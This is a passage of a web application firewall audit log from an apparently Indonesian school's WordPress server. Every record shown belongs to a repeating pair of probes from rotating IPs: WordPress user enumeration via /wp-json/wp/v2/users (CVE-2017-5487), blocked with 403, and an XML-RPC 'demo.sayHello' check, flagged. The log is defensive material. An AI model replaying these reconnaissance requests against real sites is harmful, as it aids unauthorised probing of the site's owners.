X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --28aa8000-C-- demo.sayHello --28aa8000-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --28aa8000-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747447741047554 4710 (- - -) Stopwatch2: 1747447741047554 4710; combined=3510, p1=415, p2=2876, p3=29, p4=34, p5=92, sr=54, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28aa8000-Z-- --6fb75622-A-- [17/May/2025:09:14:36 +0700] aCfxDHyxdQCiyU1ENFcobQAAABY 103.236.140.4 45096 103.236.140.4 8181 --6fb75622-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.121 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6fb75622-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fb75622-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747448076685050 3291 (- - -) Stopwatch2: 1747448076685050 3291; combined=1443, p1=514, p2=897, p3=0, p4=0, p5=32, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fb75622-Z-- --50b8404e-A-- [17/May/2025:09:14:42 +0700] aCfxEnyxdQCiyU1ENFcobwAAAAE 103.236.140.4 45100 103.236.140.4 8181 --50b8404e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.121 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --50b8404e-C-- demo.sayHello --50b8404e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --50b8404e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747448082555499 4659 (- - -) Stopwatch2: 1747448082555499 4659; combined=3671, p1=442, p2=2997, p3=24, p4=24, p5=105, sr=68, sw=79, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50b8404e-Z-- --be0d6a46-A-- [17/May/2025:09:14:57 +0700] aCfxIXyxdQCiyU1ENFcocQAAAAM 103.236.140.4 45104 103.236.140.4 8181 --be0d6a46-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --be0d6a46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be0d6a46-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747448097561187 2834 (- - -) Stopwatch2: 1747448097561187 2834; combined=1235, p1=427, p2=778, p3=0, p4=0, p5=29, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be0d6a46-Z-- --68fc2304-A-- [17/May/2025:09:15:03 +0700] aCfxJ-m4kjNN-hEbWjJBpgAAAEM 103.236.140.4 45108 103.236.140.4 8181 --68fc2304-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.192 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --68fc2304-C-- demo.sayHello --68fc2304-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --68fc2304-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747448103209577 5744 (- - -) Stopwatch2: 1747448103209577 5744; combined=4173, p1=546, p2=3399, p3=32, p4=36, p5=95, sr=77, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68fc2304-Z-- --249f5761-A-- [17/May/2025:09:15:25 +0700] aCfxPXyxdQCiyU1ENFcodAAAAAY 103.236.140.4 45112 103.236.140.4 8181 --249f5761-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.180.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.180.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --249f5761-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --249f5761-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747448125093446 2909 (- - -) Stopwatch2: 1747448125093446 2909; combined=1312, p1=433, p2=850, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --249f5761-Z-- --f013a803-A-- [17/May/2025:09:15:31 +0700] aCfxQ3yxdQCiyU1ENFcodgAAAAo 103.236.140.4 45116 103.236.140.4 8181 --f013a803-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.180.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.180.29 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f013a803-C-- demo.sayHello --f013a803-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f013a803-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747448131546098 5855 (- - -) Stopwatch2: 1747448131546098 5855; combined=4298, p1=558, p2=3517, p3=32, p4=34, p5=92, sr=78, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f013a803-Z-- --d187d371-A-- [17/May/2025:09:16:02 +0700] aCfxYnyxdQCiyU1ENFcoeAAAAAw 103.236.140.4 45120 103.236.140.4 8181 --d187d371-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d187d371-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d187d371-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747448162325666 2825 (- - -) Stopwatch2: 1747448162325666 2825; combined=1283, p1=420, p2=833, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d187d371-Z-- --d9c8a172-A-- [17/May/2025:09:16:08 +0700] aCfxaHyxdQCiyU1ENFcoegAAABE 103.236.140.4 45124 103.236.140.4 8181 --d9c8a172-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.162 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d9c8a172-C-- demo.sayHello --d9c8a172-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9c8a172-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747448168838203 4681 (- - -) Stopwatch2: 1747448168838203 4681; combined=3659, p1=446, p2=3019, p3=22, p4=23, p5=88, sr=67, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9c8a172-Z-- --4ac9827a-A-- [17/May/2025:09:16:56 +0700] aCfxmOm4kjNN-hEbWjJBpwAAAEE 103.236.140.4 45128 103.236.140.4 8181 --4ac9827a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.83 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4ac9827a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ac9827a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747448216991177 2882 (- - -) Stopwatch2: 1747448216991177 2882; combined=1257, p1=440, p2=787, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ac9827a-Z-- --fc86480d-A-- [17/May/2025:09:17:02 +0700] aCfxnnyxdQCiyU1ENFcofQAAABQ 103.236.140.4 45132 103.236.140.4 8181 --fc86480d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.83 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fc86480d-C-- demo.sayHello --fc86480d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc86480d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747448222697725 5887 (- - -) Stopwatch2: 1747448222697725 5887; combined=4327, p1=554, p2=3433, p3=33, p4=36, p5=150, sr=72, sw=121, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc86480d-Z-- --28fd2827-A-- [17/May/2025:09:19:24 +0700] aCfyLATOsBn9MSWb6WJu-QAAAIc 103.236.140.4 45156 103.236.140.4 8181 --28fd2827-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.5 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --28fd2827-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --28fd2827-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747448364167933 2804 (- - -) Stopwatch2: 1747448364167933 2804; combined=1265, p1=449, p2=785, p3=0, p4=0, p5=31, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28fd2827-Z-- --bd090554-A-- [17/May/2025:09:19:31 +0700] aCfyMwTOsBn9MSWb6WJu-gAAAIg 103.236.140.4 45160 103.236.140.4 8181 --bd090554-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.5 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bd090554-C-- demo.sayHello --bd090554-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd090554-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747448371045757 4923 (- - -) Stopwatch2: 1747448371045757 4923; combined=3807, p1=481, p2=3036, p3=24, p4=28, p5=175, sr=68, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd090554-Z-- --a3d14564-A-- [17/May/2025:09:21:28 +0700] aCfyqBKi5m5upc8uMd6iVAAAANQ 103.236.140.4 45192 103.236.140.4 8181 --a3d14564-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.115 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a3d14564-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3d14564-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747448488985808 3033 (- - -) Stopwatch2: 1747448488985808 3033; combined=1296, p1=451, p2=816, p3=0, p4=0, p5=29, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3d14564-Z-- --0675aa2e-A-- [17/May/2025:09:21:34 +0700] aCfyrum4kjNN-hEbWjJBrQAAAEs 103.236.140.4 45196 103.236.140.4 8181 --0675aa2e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.115 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0675aa2e-C-- demo.sayHello --0675aa2e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0675aa2e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747448494606589 5676 (- - -) Stopwatch2: 1747448494606589 5676; combined=4136, p1=540, p2=3377, p3=32, p4=34, p5=91, sr=78, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0675aa2e-Z-- --4f33f74b-A-- [17/May/2025:09:33:24 +0700] aCf1dHyxdQCiyU1ENFcoiQAAABY 103.236.140.4 45246 103.236.140.4 8181 --4f33f74b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4f33f74b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f33f74b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449204164194 3302 (- - -) Stopwatch2: 1747449204164194 3302; combined=1453, p1=475, p2=946, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f33f74b-Z-- --2352da38-A-- [17/May/2025:09:33:30 +0700] aCf1enyxdQCiyU1ENFcoigAAABg 103.236.140.4 45250 103.236.140.4 8181 --2352da38-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2352da38-C-- demo.sayHello --2352da38-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2352da38-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449210230210 5838 (- - -) Stopwatch2: 1747449210230210 5838; combined=4241, p1=563, p2=3454, p3=32, p4=35, p5=94, sr=81, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2352da38-Z-- --006f9654-A-- [17/May/2025:09:35:03 +0700] aCf113yxdQCiyU1ENFcoiwAAAAA 